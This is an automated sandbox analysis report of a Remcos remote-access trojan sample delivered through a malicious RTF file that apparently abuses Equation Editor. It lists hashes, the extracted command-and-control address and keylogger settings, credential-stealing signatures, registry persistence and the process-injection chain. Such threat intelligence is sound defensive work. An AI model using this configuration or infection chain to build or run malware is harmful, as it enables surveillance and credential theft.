remcos | 5cddac4ad1172af8fe40dc2b40160fbdfebbf2023cf2d15a6e8a61ef7629d1be

Analysis

max time kernel
148s
max time network
148s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
02-04-2024 13:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73c5b71d2923b11a8b262321c6229520c93115f82c78d742f041a650725d482f.rtf
Size

63KB
MD5

b5b2948d407676eab86b1152e7ce5ec4
SHA1

85de7e562d97c36b9318393fd6185df6b1ba55b9
SHA256

73c5b71d2923b11a8b262321c6229520c93115f82c78d742f041a650725d482f
SHA512

b2048e775bccc0f0cc144fcfaa4e3067fa4ed2613f1e152323673c6497a82815d2ef366d29289214cf5f0007a3c8537af6f40b6ab07a1a936ed4f4612be9725a
SSDEEP

1536:fgoIW1uYod+RuUl9Zh7teyDdvqMhRSiupwk8uXjlh17AY9j:otyuYod+RuAZh84vSiowk8uXjlh17AYR

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

107.172.31.178:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-NVSJ5U
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/3028-183-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3028-185-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/3028-205-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/932-175-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/932-176-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/932-190-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/932-175-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/932-176-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/3028-183-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/3028-185-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/932-190-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1500-195-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1500-196-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1500-197-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1500-198-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/3028-205-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 7 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

3 2020 EQNEDT32.EXE
7 2560 WScript.exe
9 2560 WScript.exe
12 1544 powershell.exe
14 1544 powershell.exe
16 1544 powershell.exe
17 1544 powershell.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
3	2020	EQNEDT32.EXE
7	2560	WScript.exe
9	2560	WScript.exe
12	1544	powershell.exe
14	1544	powershell.exe
16	1544	powershell.exe
17	1544	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\KRTF.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 1544 set thread context of 2236	1544	powershell.exe	RegAsm.exe
PID 2236 set thread context of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 set thread context of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 set thread context of 1500	2236	RegAsm.exe	RegAsm.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2020 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
2020	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2988 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

2744 powershell.exe
1544 powershell.exe
772 powershell.exe
932 RegAsm.exe
932 RegAsm.exe
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

RegAsm.exe

pid process

2236 RegAsm.exe
2236 RegAsm.exe
2236 RegAsm.exe
2236 RegAsm.exe
2236 RegAsm.exe
2236 RegAsm.exe
2236 RegAsm.exe

pid	process
2988	WINWORD.EXE

pid	process
2744	powershell.exe
1544	powershell.exe
772	powershell.exe
932	RegAsm.exe
932	RegAsm.exe

pid	process
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	1500	RegAsm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2988 WINWORD.EXE
2988 WINWORD.EXE

pid	process
2988	WINWORD.EXE
2988	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXEpowershell.exeRegAsm.exe

description	pid	process	target process
PID 2020 wrote to memory of 2560	2020	EQNEDT32.EXE	WScript.exe
PID 2020 wrote to memory of 2560	2020	EQNEDT32.EXE	WScript.exe
PID 2020 wrote to memory of 2560	2020	EQNEDT32.EXE	WScript.exe
PID 2020 wrote to memory of 2560	2020	EQNEDT32.EXE	WScript.exe
PID 2560 wrote to memory of 2744	2560	WScript.exe	powershell.exe
PID 2560 wrote to memory of 2744	2560	WScript.exe	powershell.exe
PID 2560 wrote to memory of 2744	2560	WScript.exe	powershell.exe
PID 2560 wrote to memory of 2744	2560	WScript.exe	powershell.exe
PID 2744 wrote to memory of 1544	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 1544	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 1544	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 1544	2744	powershell.exe	powershell.exe
PID 2988 wrote to memory of 2220	2988	WINWORD.EXE	splwow64.exe
PID 2988 wrote to memory of 2220	2988	WINWORD.EXE	splwow64.exe
PID 2988 wrote to memory of 2220	2988	WINWORD.EXE	splwow64.exe
PID 2988 wrote to memory of 2220	2988	WINWORD.EXE	splwow64.exe
PID 1544 wrote to memory of 772	1544	powershell.exe	powershell.exe
PID 1544 wrote to memory of 772	1544	powershell.exe	powershell.exe
PID 1544 wrote to memory of 772	1544	powershell.exe	powershell.exe
PID 1544 wrote to memory of 772	1544	powershell.exe	powershell.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 1544 wrote to memory of 2236	1544	powershell.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 932	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 3028	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 472	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 780	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 780	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 780	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 780	2236	RegAsm.exe	RegAsm.exe
PID 2236 wrote to memory of 780	2236	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\73c5b71d2923b11a8b262321c6229520c93115f82c78d742f041a650725d482f.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2220

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
